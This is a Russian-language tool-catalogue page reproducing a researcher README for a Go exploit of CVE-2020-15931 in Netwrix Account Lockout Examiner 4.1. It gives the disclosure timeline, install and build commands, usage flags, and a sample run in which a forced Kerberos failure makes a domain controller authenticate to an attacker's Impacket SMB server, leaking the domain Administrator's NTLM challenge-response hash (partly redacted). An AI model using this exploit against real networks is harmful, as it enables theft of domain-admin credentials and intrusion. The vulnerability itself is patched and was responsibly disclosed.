Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-15931 — Netwrix Account Lockout Examiner 4.1 Уязвимость раскрытия учетных данных учетной записи администратора домена | Kitploit
Инструменты/GitHubGitHub/optiv/cve-2020-15931
Анализ уязвимостейЭксплуатацияСбор информацииТестирование на ПроникновениеRed Teaming
GitHuboptiv/cve-2020-15931

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 Уязвимость раскрытия учетных данных учетной записи администратора домена

Репозиторий
2855 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 Уязвимость раскрытия учетных данных учетной записи администратора домена

Обзор уязвимости

Netwrix Account Lockout Examiner (ALE) до версии 5.1 позволяет неаутентифицированному удаленному злоумышленнику инициировать подключение к системе, контролируемой атакующим, и перехватить запрос-ответ NTLMv1/v2 учетной записи с правами администратора домена. Учетная запись администратора домена должна быть уже настроена в продукте, как того требует установка. Злоумышленник может использовать это, генерируя одно событие сбоя предварительной аутентификации Kerberos (Event ID 4771) на контроллере домена.

Более подробную информацию об уязвимости можно найти в следующем блоге

image

Благодарности

Уязвимость была обнаружена в реальных условиях Робертом Сураче (@robsauce) и Дэниелом Мином (@bigb0ss), консультантами Optiv Security, во время проведения оценки безопасности. После идентификации CVE-2020-15931 компания Optiv немедленно связалась с Netwrix для ответственного раскрытия обнаруженной ошибки.

График раскрытия уязвимости

  • 9 июня 2020 – Уязвимость обнаружена компанией Optiv
  • 15 июня 2020 – Раскрыта компанией Optiv вендору
  • 14 июля 2020 – Вендор подтвердил проблему и согласился выпустить исправленную версию
  • 23 июля 2020 – Раскрыта CNA (MITRE Corporation)
  • 24 июля 2020 – Вендор выпустил исправленную версию Netwrix Account Lockout Examiner 5.1
  • 24 июля 2020 – CVE-2020-15931 присвоен CNA (MITRE Corporation)
  • 13 августа 2020 – Раскрыта общественности
  • 30 октября 2020 – Базовый балл 7.5 (высокий) присвоен NVD (National Vulnerability Database)

Эксплоит-скрипт

Установка

Эксплоит-скрипт разработан на языке Go. Установите следующие зависимости:

root@kitploit:~
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config

Также используется smbserver.py из Impacket.

root@kitploit:~
pip install impacket

Наконец, загрузите эксплоит-скрипт и соберите его.

root@kitploit:~
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go

Использование

root@kitploit:~
$  ./cve-2020-15931

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

 
    Required:
    -d            Domain name
    -dc           Domain controller 
    -u            Valid username 
    
    Optional:
    -h            Print this help menu

    Example:
    ./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith

Эксплоит

(Примечание: на момент написания эта атака может быть идентифицирована только с помощью слепой атаки. Это связано с тем, что сложно определить, использует ли целевая организация Netwrix Account Lockout Examiner в своей сети для аудита аутентификаций учетных записей или нет.)

root@kitploit:~
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

[+] DC: 	10.10.0.2
[+] Domain: 	bosslab.com
[+] Username: 	b0ss1
[+] Password: 	wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...

Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []

Ссылки

Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931

Скачать инструмент